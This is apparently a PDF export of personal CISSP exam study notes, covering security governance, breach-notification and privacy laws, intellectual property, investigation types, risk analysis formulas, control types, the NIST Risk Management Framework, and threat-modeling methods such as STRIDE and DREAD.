2025 CISSP Domain Objectives
2025 CISSP Domain Objectives
MD 2025-06-11
1 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Security governance should address every aspect of an org, including organizational processes of
acquisitions, divestitures, and governance
Be aware of the risks in acquisitions (since the state of the IT environment to be integrated is unknown,
due diligence is key) and divestitures (how to split the IT infrastructure and what to do with identities and
credentials)
Understand the value of governance committees (vendor governance, project governance, architecture
governance, etc.)
Executives, managers and appointed individuals meet to review architecture, projects and incidents
(security or otherwise),and provide approvals for new strategies or directions
The goal is a fresh set of eyes, often eyes that are not purely focused on information security
When evaluating a third-party for your security integration, consider the following:
on-site assessment
document exchange and review
process/policy review
third-party audit
1.3.3 Organizational Roles and Responsibilities
Primary security roles are senior manager, security professional, asset owner, custodian, user, and auditor
Senior Manager: has a responsibility for organizational security and to maximize profits and shareholder
value
Security Professional: has the functional responsibility for security, including writing the security policy
and implementing it
Asset Owner: responsible for classifying information for placement or protection within the security
solution
Custodian: responsible for the task of implementing the proscribed protection defined by the security
policy and senior management
Auditor: responsible for reviewing and verifying that the security policy is properly implemented
1.3.4 Security control frameworks (e.g. International Organization for Standardization (ISO), National Institute of
Standards and Technology (NIST), Control Objectives for Information and Related Technology (COBIT),
Sherwood Applied Business Security Architecture (SABSA), Payment Card Industry (PCI), Federal Risk and
Authorization Management Program (FedRAMP))
A security control framework: (AKA security frameworks) outlines the org's approach to security,
including guidelines, standards and controls; a security framework is important in planning the structure
of an org's security solution; frameworks include:
International Organization for Standardization (ISO): a non-governmental org comprised of
standards bodies from over 160 countries that bring global experts together to agree on best
practices across a range of industries with six main products: International Standards, Technical
Reports, Technical Specifications, Publicly Available Specifications, Technical Corrigenda, and
Guides; ISO standards are widely used
ISO/IEC 27001: a widely recognized international standard for information security
management systems (ISMS); it provides a risk-based approach, and emphasizes continual
improvement of the ISMS
ISO 27000 series (27000, 27001, 27002, etc.) is the international security standard for
implementing organizational security and includes:
ISO 27000 2018: provides an overview of the information security
management system (ISMS)
ISO 27001 2022: provides best practice recommendations for an Information
Security Management System (ISMS)
5 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
8 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Under the HITECH Breach Notification Rule, HIPAA-covered entities that experience a data
breach must notify affected individuals, the Secretary of Health and Human Services (HHS)
and the media of the breach within 60 days of discovery, when more than 500 individuals are
affected
GLBA (Gramm-Leach-Bliley Act) applies to insurance and financial orgs, requiring notification to
federal regulators, law enforcement agencies and customers when a data breach occurs
Certain states also impose their own requirements concerning data breaches
the EU and other countries have their own requirements, for instance, the GDPR has very strict data
breach notification requirements: A data breach must be reported to the competent supervisory
authority within 72 hours of its discovery
Communications Assistance to Law Enforcement Act (CALEA): requires all communication
carriers make wiretaps possible for law enforcement officials who have an appropriate court order
Note that some countries do not have any reporting requirements
1.4.2 Licensing and Intellectual Property requirements
Intellectual property: intangible assets (e.g. software, data)
Trademarks: words, slogans, and logos used to identify a company and its products or services
Patents: provide protection to the creators of new inventions; a temporary monopoly for producing a
specific item such as a toy, which must be novel and unique to qualify for a patent
Utility: protect the intellectual property rights of inventors
Design: cover the appearance of an invention and last for 15 years; note design patents don't
protect the idea of an invention only its form, and are generally seen as weaker
Software: area of on-going controversy; Google vs Oracle; given to a rise of "patent trolls"
Copyright: protects original works of authorship, such as books, articles, poems, and songs; exclusive
use of artistic, musical or literary works which prevents unauthorized duplication, distribution or
modification
Licensing: a contract between the software producer and the consumer which limits the use and/or
distribution of the software
Trade Secrets: trade secret laws protect the operating secrets of a firm; trade secrets are intellectual
property that is critical to a business, and significant damage would result if it were disclosed to
competitors or the public; the Economic Espionage Act imposes fines and jail sentences on someone
found guilty of stealing trade secrets from a US corp
1.4.3 Import/export controls
Every country has laws around the import and export of hardware and software; e.g. the US has
restrictions around the export of cryptographic technology, and Russia requires a license to import
encryption technologies manufactured outside the country
International Traffic in Arms Regulations (ITAR): a US regulation controlling the manufacture, export,
and import of military or defense items (e.g. missiles, rockets, bombs, or anything else existing in the
United States Munitions List (USML))
The Export Administration Regulations (EAR): EAR predominantly focuses on commercial use-related
items like computers, lasers, marine items, and more; however, it can also include items that may have
been designed for commercial use but actually have military applications
1.4.4 Transborder data flow
Orgs should adhere to origin country-specific laws and regulations, regardless of where data resides; also
be aware of applicable laws where data is stored and systems are used
Wassenaar Arrangement: multinational agreement, voluntary export control
9 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
1.4.5 Issues related to privacy (e.g., General Data Protection Regulation (GDPR), California Consumer Privacy
Act, Personal Information Protection Law, Protection of Personal Information Act)
Be familiar with the requirements around healthcare data, credit card data and other PII data as it relates
to various countries and their laws and regulations
California SB 1386 (2002): immediate disclosure to individuals for PII breach
California Consumer Privacy Act (CCPA): The CCPA applies to:
For-profit businesses that collect consumersʼ personal information (or have others collect personal
information for them)
Determine why and how the information will be processed
Do business in California and meet any of the following:
have a gross annual revenue > $25 million;
buy, sell, or share the personal information of 100k or more California residents or
households; or
get 50% or more of their annual revenue from selling or sharing California residentsʼ personal
information
The CCPA imposes separate obligations on service providers and contractors (who contract with
businesses to process personal info) and other recipients of personal information from businesses
The CCPA does not generally apply to nonprofit orgs or government agencies
California residents have the right to:
(L)imit use and disclosure of personal info
(O)pt-out of sale or cross-context advertising
(C)orrect inaccurate info
(K)now what personal info business have and share
(E)qual treatment / nondiscrimination
(D)elete info business have on them
See the National Conference of State Legislatures (NCSL) list of state-based data breach
notifications
Children's Online Privacy Protection Act (COPPA) of 1998:
COPPA makes a series of demands on websites that cater to children or knowingly collect
information from children:
Websites must have a privacy notice that clearly states the types of info they collect and
what it's used for (including whether info is disclosed to third parties); must also include
contact info for site operators
Parents must be able to review any info collected from children and permanently delete it
from the site's records
Parents must give verifiable consent to the collection of info about children younger than the
age of 13 prior to any such collection
Clarifying Lawful Overseas Use of Data (CLOUD): act allowing law enforcement to gather digital
evidence from US companies regardless of where the data is stored
US government can make bilateral agreements with other countries to provide reciprocal rights
US-based companies must comply with lawful orders for data disclosure from foreign governments
Companies are provided a mechanism to challenge data requests
Electronic Communication Privacy Act (ECPA): as amended, protects wire, oral, and electronic
communications while those communications are being made, are in transit, and when they are stored on
computers; makes it a crime to invade electronic privacy of an individual, and it broadened the Federal
Wiretap Act
Electronic Espionage Act of 1996: the EEA was enacted to address the threat of trade secret theft,
misappropriations, or economic espionage by foreign entities changing the definitino of theft so it was no
longer restricted by physical constraints
10 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Family Education Rights and Privacy Act (FERPA): Grants privacy rights to students over 18, and the
parents of minor students
Fourth Amendment to the US Constitution: the right of the people to be secure in their persons,
houses, papers, effects against unreasonable search and seizure
General Data Protection Regulation (GDPR): replaced Data Protection Directive (DPD), purpose is to
provide a single, harmonized law that covers data throughout the EU
Key aspects:
Lawfulness, fairness, and transparency
Purpose Limitation
Data Minimization
Accuracy
Storage Limitation
Security
Accountability
GDPR's privacy rules apply to any org anywhere that stores or processes the personal data of EU
residents; these individuals must be told how their data is collected and used, and they must be
able to opt out
Be familiar with the EU Data Protection Directive (Directive 95/46/EC, which was superseded by
GDPR)
GLBA: see above
HIPAA: (see above) note that HITECH updated many of HIPAA's privacy and security requirements,
including requiring a written contract between a HIPAA-covered entity and their business associates (e.g.
orgs that handle PHI on their behalf)
HITECH: (see abovve) note that notification required by HIPAA-covered entities within 60 days of
discovery when more than 500 individuals are affected
Organization for Economic Co-operation and Development (OECD): 8 best practices privacy
principles: collection limitation, data quality, purpose specification, use limitation, security safeguards,
openness, individual participation, and accountability; require orgs to avoid unjustified obstacles to trans-
border data flow, set limits to personal data collection, protect personal data with reasonable security and
more
Privacy Act of 1974: a US federal law designed to protect individuals' personal information help by
federal government agencies, mandating that agencies only keep records necessary for conducting their
business, and procedures for people to get access to the government maintained records
Personal Information Protection and Electronic Documents Act (PIPEDA): Canadian law that governs
the use of personal information
Personal Information Protection Law (PIPL): comprehensive Chinese data privacy law, with similarities
to GDPR
Key aspects of PIPL:
Concent and purpose: explicit consent is required for data aggregation and processing, and
individuals can withdraw consent
Minimum Data Collection: PIPL requires orgs only collect only relevant and necessary
personal data
Data Subject Rights: provides people with rights to access, correction, deletion, and to be
informed of data breaches
Cross-Border Data Transfer: imposes restrictions on transferring personal data outside of
China
Privacy Shield: (formerly the EU-US Safe Harbor agreement): controls data flow from the EU to the
United States; the EU has more stringent privacy protections and without the Privacy Shield, personal
data flow from the EU to the United States would not be allowed
Protection of Personal Information Act (POPIA): South Africa's comprehensive data protection law
designed to protection personal information processed by public and private entities, and promote the
11 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
right to privacy
Key provisions of POPIA:
Applies to any organization processing PII of natural or juristic persons in SA
Eight conditions for lawful processing
accountability
processing limitation (minimality and consent)
purpose specification
information quality
openness
security safeguards
data subject participation
limitation on further processing
Consent required from data subject to process data, or from a parent or guardian is the
subject is a child
Strict conditions on special personal information (race, religion, trade union membership,
political affiliation etc)
Restricts cross-boarder information transfers unless recipient country has similar privacy
protections
Penalties for POPIA violation can be severe, enforced by the Information Regulator
US Patriot Act of 2001: enacted following the September 11 attacks with the stated goal of tightening
U.S. national security, particularly as it related to foreign terrorism
The act included three main provisions:
expanded surveillance abilities of law enforcement, including by tapping domestic and
international phones
easier interagency communication to allow federal agencies to more effectively use all
available resources in counter-terrorism efforts, allowing government to obtain detailed
information on user activity through a subpoena, and ISPs can voluntarily provide a large
range of information to the government
increased penalties for terrorism crimes and an expanded list of activities which would
qualify for terrorism charges
1.4.6 Contractual, legal, industry standards, and regulatory requirements
Understand the difference between criminal, civil, and administrative law.
Criminal law: protects society against acts that violate the basic principles we believe in; violations
of criminal law are prosecuted by federal and state governments
Civil law: provides the framework for the transaction of business between people and
organizations; violations of civil law are brought to the court and argued by the two affected parties
Administrative law: used by government agencies to effectively carry out their day-to-day
business
Compliance: Organizations may find themselves subject to a wide variety of laws, and regulations
imposed by regulatory agencies or contractual obligation
Payment Card Industry Data Security Standard (PCI DSS) - governs the security of credit card
information and is enforced through the terms of a merchant agreement between a business that
accepts CC payments, and the bank that processes the business' transactions
Sarbanes-Oxley (SOX): governs publicly traded corps; financial systems may be audited to
ensure security controls are sufficient to ensure compliance with SOX; requires top management to
individually certify the accuracy of financial info
violations include criminal penalties
Gramm-Leach-Bliley Act (GLBA) - affects banks, insurance companies, and credit providers;
included a number of limitations on the types of information that could be exchanged even among
12 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
subsidiaries of the same corp, and required financial institutions to provide written privacy policies
to all their customers
Health Insurance Portability and Accountability Act (HIPAA) - privacy and security regulations
requiring strict security measures for hospitals, physicians, insurance companies, and other
organizations that process or store private medical information about individuals; also clearly
defines the rights of individuals who are the subject of medical records and requires organizations
that maintain such records to disclose these rights in writing
includes criminal penalties for violations
Federal Information Security Management Act (FISMA) - requires federal agencies to
implement an information security program that covers the agency's operations and contractors;
the Federal Information Security Modernization Act of 2014 amended the 2002 version of FISMA by
centralizing federal cybersecurity responsibility within the Department of Homeland Security (DHS)
except for defense-related cybersecurity and scope of the DNI (Director of National Intelligence);
teh Cybersecurity Enhancement Act of 2014 charged NIST with coordination of voluntary nation-
wide cybersecurity standards
Electronic Communications Privacy Act (ECPA) - in short, makes it a crime to invade the
electronic privacy of an individual; passed in 1986 to expand and revise federal wiretapping and
electronic eavesdropping provisions, making it a crime to intercept or procure electronic
communications, and includes important provisions that protect a personʼs wire and electronic
communications from being intercepted by another private individual
Digital Millennium Copyright Act (DMCA) - prohibits the circumvention of copyright protection
mechanisms placed in digital media and limits the liability of internet service providers for the
activities of their users
1.5 Understand requirements for investigation types (i.e., administrative, criminal, civil,
regulatory, industry standards) (OSG-10 Chpt 19)
An investigation will vary based on incident type; e.g. for a financial services company, a financial system
compromise might cause a regulatory investigation; a system breach or website compromise might cause a
criminal investigation; each type of investigation has special considerations:
Administrative: internal investigations usually review operational issues or violations of an organization's
policies; often tied to HR scenarios, an admin investigation could be part of technical troubleshooting;
since these investigations are for internal purposes, they usually have the lowest formality and standards
in terms of documentation or procedures compared to other types; admin investigations often focus on
finding the root cause of operational issues
Criminal: a criminal investigation occurs when a crime has been committed and you are working with a
law enforcement agency to convict the alleged perpetrator; in such a case, it is common to gather
evidence for a court of law, and to share the evidence with the defense
You need to gather and handle the information using methods that ensure the evidence can be
used in court
In a criminal case, a suspect must be proven guilty beyond a reasonable doubt; a higher bar
compared to a civil case, which is showing a preponderance of evidence
Civil: in a civil case, one person or entity sues another, e.g. one company could sue another for a
trademark violation
A civil case is typically about monetary damages, and doesn't involve criminality
In a civil case, a preponderance of evidence is required to secure a victory, differing from criminal
cases, where a suspect is innocent until proven guilty beyond a reasonable doubt; evidence
collection standards for civil investigations usually are usually lower than criminal cases
Industry Standards: an industry standards investigation is intended to determine whether an org is
adhering to a specific industry standard or set of standards, such as those associated with PCI DSS;
13 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
because standards are not laws, these investigations can be related to contractual compliance, and an
org may be required to participate in audits or assessments
Because industry standards represent well-understood and widely implemented best practices,
many orgs try to adhere to them even when they are not required to do so in order to improve
security, and reduce operational and other risks
Regulatory: A regulatory investigation is conducted by a regulatory body, such as the Securities and
Exchange Commission (SEC) or Financial Industry Regulatory Authority (FINRA), against an org suspected
of an infraction
Here the org is required to comply with the investigation, e.g., by not hiding or destroying evidence
1.6 Develop, document, and implement security policy, standards, procedures and
guidelines (OSG-10 Chpt 1)
To create a comprehensive security plan, you need the following items: security policy, standards, baselines,
guidelines, and procedures
The top tier of a formalized hierarchical organization security documentation is the security policy
Policy: docs created by and published by senior management describing organizational strategic goals
A security policy is a document that defines the scope of security needed by the org, discussing assets
that require protection and the extent to which security solutions should go to provide the necessary
protections
It defines the strategic security objectives, vision, and goals and outlines the security framework of the
organization
Acceptable User Policy: the AUP is a commonly produced document that exists as part of the overall security
documentation infrastructure
This policy defines a level of acceptable performance and expectation of behavior and activity; failure to
comply with the policy may result in job action warnings, penalties, or termination
Security Standards, Baselines and Guidelines: once the main security policies are set, the remaining security
documentation can be crafted from these policies
Policies: these are high-level documents, usually written by the management team; policies are
mandatory, and a policy might provide requirements, but not the steps for implementation
Standards: specific mandates explicitly stating expectations of performance/conformance; more
descriptive than policies, standards define compulsory requirements for the homogenous use of
hardware, software, technology, and security controls, uniformly implemented throughout the org
Baseline: defines a minimum level of security that every system throughout the organization must meet;
baselines are usually system specific and refer to industry / government standards
e.g. a baseline for server builds would be a list of configuration areas that should be applied to
every server that is built
A Group Policy Object (GPO) in a Windows network is sometimes used to comply with standards;
configuration management solutions can also help you establish baselines and spot configurations
that are not in alignment
Guideline: offers recommendations on how standards and baselines should be implemented & serves as
an operational guide for security professionals and users
Guidelines are flexible, and can be customized for unique systems or conditions; they state which
security mechanism should be deployed instead of prescribing a specific product or control; they
are not compulsory; suggested practices and expectations of activity to best accomplish tasks and
goals
Procedure (AKA Standard Operating Procedure or SOP): detailed, step-by-step how-to doc that
describes the exact actions necessary to implement a specific security mechanism, control, or solution
1.7 Identify, analyze, assess, prioritize, and implement Business Continuity (BC)
requirements (OSG-10 Chpt 3)
14 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Termination or offboarding: offboarding is the removal of an employee's identity from the IAM system,
once that person has left the org; can also be an element used when an employee transfers into a new
role
whether cordial or abrupt, the ex-employee should be escorted off the premises and not allowed to
return
1.8.4 Vendor, consultant, and contractor agreements and controls
Orgs commonly outsource many IT functions, particularly data center hosting, contact-center support,
and application development
Info security policies and procedures must address outsourcing security and the use of service providers,
vendors and consultants
e.g. access control, document exchange and review, maintenance, on-site assessment, process
and policy review, and Service Level Agreements (SLAs) are examples of outsourcing security
considerations
1.9 Understand and apply risk management concepts (OSG-10 Chpt 2)
1.9.1 Threat and vulnerability identification
Risk Management: process of identifying factors that could damage or disclose data, evaluating those
factors in light of data value and countermeasure cost, and implementing cost-effective solutions for
mitigating or reducing risk
Threats: any potential occurrence that many cause an undesirable or unwanted outcome for a specific
asset; they can be intentional or accidental; loosely think of a threat as a weapon that could cause harm
to a target
Vulnerability: the weakness in an asset, or weakness (or absence) of a safeguard or countermeasure; a
flaw, limitation, error, frailty, or susceptibility to harm
Threats and vulnerabilities are related: a threat is possible when a vulnerability is present
Threats exploit vulnerabilities, which results in exposure
Exposure is risk, and risk is mitigated by safeguards
Safeguards protect assets that are endangered by threats
Threat Agent/Actors: intentionally exploit vulnerabilities
Threat Events: accidental occurrences and intentional exploitations of vulnerabilities
Threat Vectors: (AKA attack vector) is the path or means by which an attack or attacker can gain
access to a target in order to cause harm
Exposure: being susceptible to asset loss because of a threat; the potential for harm to occur
Exposure Factor (EF): derived from this concept; an element of quantitative risk analysis that
represents the percentage of loss that an org would experience if a specific asset were violated by
a realized risk
Single Loss Expectancy (SLE): an element of quantitative risk analysis that represents the cost
associated with a single realized risk against a specific asset; SLE = asset value (AV) * exposure
factor (EF); a metric that represents the magnitude of loss or impact that a threat could have on a
system or data, quantified as a percentage of loss that a realized threat would have on a specific
asset; e.g. an EF of 0.2 (or 20%) for a specific threat would indicate that a realization of that threat
would result in a loss of 20% of the assetʼs value
Annualized rate of occurrence (ARO): an element of quantitative risk analysis that represents the
expected frequency with which a specific threat or risk will occur within a single year
Annualized loss expectancy (ALE): an element of quantitative risk analysis that represents the
possible yearly cost of all instances of a specific realized threat against a specific asset; ALE = SLE
* ARO
18 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Safeguard evaluation: ALE for an asset if a safeguard is implemented; ALE before safeguard - ALE
with safeguard - annual cost of safeguard, or (ALE1 - ALE2) - ACS
Risk: the possibility or likelihood that a threat will exploit a vulnerability to cause harm to an asset
and the severity of damage that could result; the > the potential harm, the > the risk
1.9.2 Risk analysis, assessment, and scope
Risk Assessment: used to identify the risks and set criticality priorities, and then risk response is used to
determine the best defense for each identified risk
Risk is threat with a vulnerability
Risk = threat * vulnerability (or probability of harm multiplied by severity of harm)
Addressing either the threat or threat agent or vulnerability directly results in a reduction of risk (known as
threat mitigation)
All IT systems have risk; all orgs have risk; there is no way to eliminate 100% of all risks
Instead upper management must decide which risks are acceptable, and which are not; there are
two primary risk-assessment methodologies:
Quantitative Risk Analysis: assigns real dollar figures to the loss of an asset and is based
on mathematical calculations
Qualitative Risk Analysis: assigns subjective and intangible values to the loss of an asset
and takes into account perspectives, feelings, intuition, preferences, ideas, and gut
reactions; qualitative risk analysis is based more on scenarios than calculations, and threats
are ranked to evaluate risks, costs, and effects
Most orgs employ a hybrid of both risk assessment methodologies
The goal of risk assessment is to identify risks (based on asset-threat parings) and rank them in
order of criticality
1.9.3 Risk response and treatment (e.g. cybersecurity insurance)
Risk response: the formulation of a plan for each identified risk; for a given risk, you have a choice for a
possible risk response:
Risk Mitigation: reducing risk, or risk mitigation, is the implementation of safeguards, security
controls, and countermeasures to reduce and/or eliminate vulnerabilities or block threats
Risk Assignment: assigning or transferring risk is the placement of the responsibility of loss due to
a risk onto another entity or organization; AKA assignment of risk and transference of risk
Risk Deterrence: deterrence is the process of implementing deterrents for would-be violators of
security and policy
the goal is to convince a threat agent not to attack
e.g. implementing auditing, security cameras, and warning banners; using security guards
Risk Avoidance: determining that the impact or likelihood of a specific risk is too great to be offset
by potential benefits, and not performing a particular business function due to that determination;
the process of selecting alternate options or activities that have less associated risk than the
default, common, expedient, or cheap option
Risk Acceptance: the result after a cost/benefit analysis determines that countermeasure costs
would outweigh the possible cost of loss due to a risk
also means that management has agreed to accept the consequences/loss if the risk is
realized
Risk Rejection: an unacceptable possible response to risk is to reject risk or ignore risk; denying
that risk exists and hoping that it will never be realized are not valid prudent due care/due diligence
responses to risk
Risk Transference: paying an external party (i.e. an insurance company) to accept the financial
impact of a given risk
19 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Inherent Risk: the level of natural, native, or default risk that exists in an environment, system, or product
prior to any risk management efforts being performed (AKA initial or starting risk); this is the risk
identified by the risk assessment process
Residual Risk: consists of threats to specific assets against which management chooses not to
implement (the risk that management has chosen to accept rather than mitigate); risk remaining after
security controls have been put in place
Total Risk: the amount of risk an org would face if no safeguards were implemented
Conceptual Total Risk Formula: threats x vulnerabilities x asset value = total risk
Controls Gap: amount of risk that is reduced by implementing safeguards, or the difference between
total risk and residual risk
Conceptual Residual Risk Formula: total risk - controls gap = residual risk
Risk should be reassessed on a periodic basis to maintain reasonable security because security changes
over time
Countermeasure: AKA a "control" or "safeguard" can help reduce risk
For exam prep, understand how the concepts are integrated into your environment; this is not a
step-by-step technical configuration, but the process of the implementation — where you start, in
which order it occurs and how you finish
Bear in mind that security should be designed to support and enable business tasks and functions
security controls, countermeasures, and safeguards can be implemented administratively,
logically / technically, or physically
these 3 categories should be implemented in a conceptual layered defense-in-depth manner
to provide maximum benefit
based on the concept that policies (part of administrative controls) drive all aspects of
security and thus form the initial protection layer around assets
then, logical and technical controls provide protection against logical attacks and exploits
then, physical controls provide protection against real-world physical attacks against
facilities and devices
1.9.4 Applicable types of controls (e.g., preventive, detection, corrective)
Three ways to implement mitigating controls:
Administrative: the policies and procedures defined by an org's security policy and other
regulations or requirements
Technical / Logical: examples include firewalls, automated backups, encryption
Physical: security mechanisms focused on providing protection to the facility and real world
objects
Safeguards:
Preventive: a preventive or preventative control is deployed to thwart or stop unwanted or
unauthorized activity from occurring
Deterrent: a deterrent control is deployed to discourage security policy violations; deterrent and
preventative controls are similar, but deterrent controls often depend on individuals being
convinced not to take an unwanted action
Directive: A directive control is deployed to direct, confine, or control the actions of subjects to
force or encourage compliance with security policies
Countermeasures:
Detective: a detective control is deployed to discover or detect unwanted or unauthorized activity;
detective controls operate after the fact
Corrective: a corrective control modifies the environment to return systems to normal after an
unwanted or unauthorized activity as occurred; it attempts to correct any problems resulting from a
security incident
20 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Recovery: An extension of corrective controls but have more advanced or complex abilities; a
recovery control attempts to repair or restore resources, functions, and capabilities after a security
policy violation
recovery controls typically address more significant damaging events compared to corrective
controls, especially when security violations may have occurred
Compensating: a compensating control is deployed to provide various options to other existing
controls, to aid in enforcement and support of security policies
they can be any controls used in addition to, or in place of, another control
they can be a means to improve the effectiveness of a primary control or as the alternative or
failover option in the event of a primary control failure
1.9.5 Control assessments (e.g. security and privacy)
Security control assessment (SCA): formal evaluation and review of individual controls against a
baseline
An SCA goal is to ensure security mechanism effectiveness; periodically assess security and privacy
controls to determine whatʼs working, what isnʼt
As part of this assessment, the existing documents should be thoroughly reviewed, and some of
the controls tested randomly
A report is typically produced to show the outcomes and enable the org to remediate deficiencies
Often, security and privacy control assessments are performed and/or validated by different teams,
with the privacy team handling the privacy aspects
For federal agencies, an SCA process generally is based on SP 800-53
1.9.6 Continuous monitoring and measurement
Monitoring and measurement are closely aligned with identifying risks
While monitoring is used for more than security purposes, monitoring should be tuned to ensure the org
is notified about potential security incidents as soon as possible
If a security breach occurs, monitored systems and data become valuable from a forensics perspective;
from the ability to derive root cause of an incident to making adjustments to minimize the chances of
reoccurrence
1.9.7 Reporting (e.g., internal, external)
Risk Reporting is a key task to perform at the conclusion of risk analysis (i.e. production and presentation
of a summarizing report)
A Risk Register or Risk Log is a document that inventories all identified risks to an org or system or within
an individual project
A risk register is used to record and track the activities of risk management, including:
identifying risks
evaluating the severity of, and prioritizing those risks
prescribing responses to reduce or eliminate the risks
track the progress of risk mitigation
1.9.8 Continuous improvement (e.g., risk maturity modeling)
Risk analysis is performed to provide upper management with the details necessary to decide which risks
should be mitigated, which should be transferred, which should be deterred, which should be avoided,
and which should be accepted; to fully evaluate risks and subsequently take proper precautions, the
following must be analyzed:
assets
asset valuation
threats
21 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
vulnerabilities
exposure
risk
realized risk
safeguards
countermeasures
attacks
breaches
An Enterprise Risk Management (ERM) program can be evaluated using an RMM
Risk Maturity Model (RMM): assesses the key indicators and activities of a mature, sustainable, and
repeatable risk management process, typically relating the assessment of risk maturity against a five-
level model such as:
Ad hoc: a chaotic starting point from which all orgs initiate risk management
Preliminary: loose attempts are made to follow risk management processes, but each department
may perform risk assessment uniquely
Defined: a common or standardized risk framework is adopted organization-wide
Integrated: risk management operations are integrated into business processes, metrics are used
to gather effectiveness data, and risk is considered an element in business strategy decisions
Optimized: risk management focuses on achieving objectives rather than just reacting to external
threats; increased strategic planning is geared toward business success rather than just avoiding
incidents; and lessons learned are re-integrated into the risk management process
1.9.9 Risk frameworks (e.g., International Organization for Standardization (ISO), National Institute of Standards
and Technology (NIST), Control Objectives for Information and Related Technology (COBIT), Sherwood Applied
Business Security Architecture (SABSA), Payment Card Industry (PCI))
See section 1.3.4 above for definitions of these frameworks
A risk framework is a guide or recipe for how risk is to be accessed, resolved, and monitored
NIST established the Risk Management Framework (RMF) and the Cybersecurity Framework (CSF):
the CSF is a set of guidelines for mitigating organizational cybersecurity risks, based on existing
standards, guidelines, and practices
The RMF is intended as a risk management process to identify and respond to threats, and is defined in
three core, interrelated Special Publications:
SP 800-37 Rev 2, Risk Management Framework for Information Systems and Organizations
SP 800-39, Managing Information Security Risk
SP 800-30 Rev 1, Guide for Conducting Risk Assessments outlines four primary steps to conduct a
risk assessment
Prepare for the assessment
Conduct assessment
identify threat sources and events
identify vulnerabilities and predisposing conditions
determine likelihood of occurrence
determine magnitude of impact
determine risk
Communicate results
Maintain assessment
The RMF has 7 steps, and six cyclical phases:
Prepare to execute the RMF from an organization and system-level perspective by
establishing a context and priorities for managing security and privacy risk
Categorize the system and the information processed, stored, and transmitted by the
system based on an analysis of the impact of loss
22 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Select an initial set of controls for the system and tailor the controls as needed to reduce risk
to an acceptable level based on an assessment of risk
Implement the controls and describe how the controls are employed within the system and
its environment of operation
Assess the controls to determine if the controls are implemented correctly, operating as
intended, and producing the desired outcomes with respect to satisfying the security and
privacy requirements
Authorize the system or common controls based on a determination that the risk to
organizational operations and assets, individuals, and other organizations, and the nation is
acceptable
Monitor the system and associated controls on an on-going basis to include assessing
control effectiveness, documenting changes to the system and environment of operation,
conducting risk assessments and impact analysis, and reporting the security and privacy
posture of the system
See my overview article, The NIST Risk Management Framework
There are other risk frameworks, such as the ISO/IEC 31000, ISO/IEC 31004, COSO's ERM, ISACA's Risk
IT, OCTAVE, FAIR, and TARA (transfer, avoid, reduce, and accept); be familiar with frameworks and their
goals
1.10 Understand and apply threat modeling concepts and methodologies (OSG-10
Chpt 1)
Threat Modeling: security process where potential threats are identified, categorized, and analyzed; can be
performed as a proactive measure during design and development (aka defensive approach) or as an
reactive measure once a product has been deployed (aka adversarial approach)
Threat modeling identifies the potential harm, the probability of occurrence, the priority of concern, and
the means to eradicate or reduce the threat
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge): a comprehensive framework
with a globally accessible knowledge base that documents real-world tactics, techniques, and procedures
(TTPs) used by cyber adversaries; it is widely used by organizations to improve threat detection, incident
response, and cybersecurity defenses; ATT&CK is used as a default model in many software packages
Microsoft uses the Security Development Lifecycle (SDL) with the motto: "Secure by design, secure by
default, secure in deployment and communication"
It has two objectives:
Reduce the number of security-related design and coding defects
Reduce the severity of any remaining defects
A defensive approach to threat modeling takes place during the early stages of development; the method is
based on predicting threats and designing in specific defenses during the coding and crafting process
Security solutions are more cost effective in this phase than later; this concept should be considered a
proactive approach to threat management
Microsoft developed the STRIDE threat model:
Spoofing: an attack with the goal of gaining access to a target system through the use of falsified identity
Tampering: any action resulting in unauthorized changes or manipulation of data, whether in transit or in
storage
Repudiation: the ability of a user or attacker to deny having performed an action or activity by maintaining
plausible deniability
Information Disclosure: the revelation or distribution of private, confidential, or controlled information to
external or unauthorized entities
Denial of Service (DoS): an attack that attempts to prevent authorized use of a resource; this can be
done through flaw exploitation, connection overloading, or traffic flooding; for example, a SYN flood is a
DoS attack that disrupts the TCP three-way handshake
23 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Elevation of privilege: an attack where a limited user account is transformed into an account with greater
privileges, powers, and access
STRIDE is threat categorization model; threat categorization is an important part of app threat modeling
Process for Attack Simulation and Threat Analysis (PASTA): a seven-stage threat modeling methodology:
Stage I: Definition of the Objectives (DO) for the Analysis of Risk
Stage II: Definition of the Technical Scope (DTS)
Stage III: Application Decomposition and Analysis (ADA)
Stage IV: Threat Analysis (TA)
Stage V: Weakness and Vulnerability Analysis (WVA)
Stage VI: Attack Modeling and Simulation (AMS)
Stage VII: Risk Analysis and Management (RAM)
Each stage of PASTA has a specific list of objectives to achieve and deliverables to produce in order to complete
the stage
Visual, Agile, and Simple Threat (VAST): a threat modeling concept that integrates threat and risk
management into an Agile programming environment on a scalable basis
Part of the job of the security team is to identify threats, using different methods:
Focus on attackers: this is a useful method in specific situations
e.g. suppose that a developerʼs employment is terminated, and that post-offboarding and review of
developerʼs computer, a determination is made that the person was disgruntled and angry
understanding this situation as a possible threat, allows mitigation steps to be taken
Focus on assets: an orgʼs most valuable assets are likely to be targeted by attackers
Focus on software: orgs that develop applications in house, and can be viewed as part of the threat
landscape; the goal isnʼt to identify every possible attack, but to focus on the big picture, identifying risks
and attack vectors
Understanding threats to the org allow the documentation of potential attack vectors; diagramming can be used
to list various technologies under threat
Reduction analysis: with a purpose of gaining a greater understanding of the logic of a product and
interactions with external elements includes breaking down a system into five core elements: trust boundaries,
data flow paths, input points, privileged operations, and security control details; AKA decomposing the
application, system, or environment
DREAD: Microsoft developed the DREAD threat modeling approach to detect and prioritize threats so that
serious threats can be mitigated first
D: Damage potential
R: Reproducibility
E: Exploitability
A: Affected users
D: Discoverability
Note that STRIDE and DREAD are used together: STRIDE to identify the threats, DREAD to prioritize them
